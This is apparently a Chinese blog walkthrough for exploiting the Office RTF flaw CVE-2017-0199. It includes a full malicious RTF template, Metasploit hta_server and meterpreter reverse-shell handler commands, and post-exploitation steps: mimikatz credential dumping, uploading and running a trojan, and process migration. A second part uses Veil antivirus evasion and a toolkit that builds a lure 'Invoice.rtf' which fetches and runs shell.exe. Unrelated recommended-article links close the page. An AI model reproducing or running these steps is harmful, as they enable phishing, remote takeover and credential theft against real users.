一大早就各种消息弹框,于是就来测试一波

https://github.com/nixawk/metasploit-framework/blob/8ab0b448fdce15999f155dfd7b22479e5f79de3a/modules/exploits/windows/fileformat/ms17_0199_rtf.rb

增加如下文件:/usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0

{\info

{\author CVE-2017-0199}

{\operator CVE-2017-0199}

}

{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}

{

{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101

{\*\objclass Word.Document.8}

{\*\objdata 0105000002000000

090000004f4c45324c696e6b000000000000000000000a0000

d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d

6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000

000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000

0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000

00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

MINISTREAM_DATA

0105000000000000}

{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}

{\*\datastore }

}

use exploit/windows/misc/hta_server

run

[*] Started reverse TCP handler on 192.168.31.122:4444
[*] Using URL: http://0.0.0.0:8080/6gOqrxRSEWc3LB.hta
[*] Local IP: http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

会自动监听端口

其实也可以:

use exploits/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.31.122

set LPORT 4444

run

use exploit/windows/fileformat/ms17_0199

set TARGETURI http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

set FILENAME haha.doc

run

load mimikatz

msv

cd d:\

upload /root/muma.exe

execute -f muma.exe

据测试下来,成功率不是很高。

2.

测试第二波

apt-get install veil-evasion(kali2安装veil会血崩) 生成一个免杀 use 35

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

msfconsole -r /var/lib/veil-evasion/output/handlers/payload_handler.rc

python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

msf接收多个session

exploit -j  后台监听
set ExitSession false

ps

迁移进程

migrate 4396

ms17_0199样本测试的更多相关文章

  1. 用2263份证件照图片样本测试how-old.net的人脸识别

    上一年也就是这个时候微软根据自己的人脸识别API推出了一个识别照片中人脸年龄和性别的网站--http://how-old.net,小伙伴们各种玩耍,一年后的今天突发"奇想"地想测试 ...

  2. 使用caffemodel模型(由mnist训练)测试单张手写数字样本

    caffe中训练和测试mnist数据集都是批处理,可以反馈识别率,但是看不到单张样本的识别效果,这里使用windows自带的画图工具手写制作0~9的测试数字,然后使用caffemodel模型识别. 1 ...

  3. 字符型图片验证码识别完整过程及Python实现

    字符型图片验证码识别完整过程及Python实现 1   摘要 验证码是目前互联网上非常常见也是非常重要的一个事物,充当着很多系统的 防火墙 功能,但是随时OCR技术的发展,验证码暴露出来的安全问题也越 ...

  4. Mallet 使用说明

    Mallet:自然语言处理工具包 发表于128 天前 ⁄ 技术, 科研 ⁄ 评论数 6 ⁄ 被围观 1006 Views+ MALLET是基于java的自然语言处理工具箱,包括分档得分类.句类.主题模 ...

  5. libsvm参数学习和核函数使用(转载)

    一.参数说明 English libsvm_options: -s svm_type : set type of SVM (default 0) 0 -- C-SVC        1 -- nu-S ...

  6. [小北De编程手记] : Lesson 02 玩转 xUnit.Net 之 基本UnitTest & 数据驱动

    关于<玩转 xUnit.Net>系列文章,我想跟大家分享的不是简单的运行一下测试用例或是介绍一下标签怎么使用(这样的文章网上很多).上一篇<Lesson 01 玩转 xUnit.Ne ...

  7. Libsvm自定义核函数【转】

    1. 使用libsvm工具箱时,可以指定使用工具箱自带的一些核函数(-t参数),主要有: -t kernel_type : set type of kernel function (default 2 ...

  8. ANTLR3完全参考指南读书笔记[08]

    前言 不要让用户被那些“专业术语”吓住! 用心设计的提示和反馈信息是软件设计者的“职业良心”.   内容 1 存在哪些错误? 2 美化错误提示 3 错误恢复策略   1 存在哪些错误? 在DSL语言开 ...

  9. Learning Theory

    Empiricial Risk Minimization 统计学习理论是整个机器学习到框架.试想我们学习的目的是什么呢?当然是为了具备用合理的方式处理问题的能力.统计学习理论要解决的问题就是基于数据找 ...

随机推荐

  1. 190707Python-MySQL

    一.Python连接MySQL import pymysql conn = pymysql.connect(host='192.168.100.4', port=3306, user='dongfei ...

  2. 如何下载github项目中的某一部分

    如何下载github项目中的某一部分 一.总结 一句话总结: 通过 DownGit 下载:原地址失败的话直接百度DownGit,一大堆可用的 通过 Chrome 插件 GitZip 进行下载(推荐) ...

  3. html实现高亮检索

    实现效果如下: demo.html <!DOCTYPE html> <html> <head> <meta charset="utf-8" ...

  4. Uep必填字段校验

    在开发中常常有必填字段, <span style="color:Red">*</span>服务地址:</td><hy:formfield ...

  5. 评【TED】陆克文:中美注定要冲突吗?

    陆克文TED演讲地址:https://www.bilibili.com/video/av2196100?from=search&seid=6953438337852168205 实话说,这篇材 ...

  6. Color色彩

    Element 为了避免视觉传达差异,使用一套特定的调色板来规定颜色,为你所搭建的产品提供一致的外观视觉感受. ¶主色 Element 主要品牌颜色是鲜艳.友好的蓝色. Blue #409EFF ¶辅 ...

  7. enumerable 可枚举 属性

    一个对象的可枚举属性会在for...in中被访问到 (或是类似的迭代方法, Object.keys() 如果一个属性不是可枚举的,循环会忽略这个属性 var obj = { key: 'val' }; ...

  8. 大众点评cat监控平台搭建

    参考官方文档:https://github.com/dianping/cat/wiki/readme_server 1.数据库相关 (1)创建数据库cat,并执行以下sql创建相关表: CREATE ...

  9. 获取重复字符串的range,设置attributedText

    之前项目的需求是未读人员显示绿色,已读人员显示黑色,测试今天提bug说存在未读人员显示的黑色...这就尴尬了,我完全不知道为啥,经过打断点调试程序,终于找到问题:就是他只会获取到第一个想等字符的ran ...

  10. java:HTML(table表格,ul列表)和CSS(导入.css文件,三种定义颜色方式,三种样式选择器,a标签属性顺序,)

    1.重点掌握: html: 1.form表单:input,checkbox,seelct,radio,button,submit 2.table表格:thead-->tr-->th;tbo ...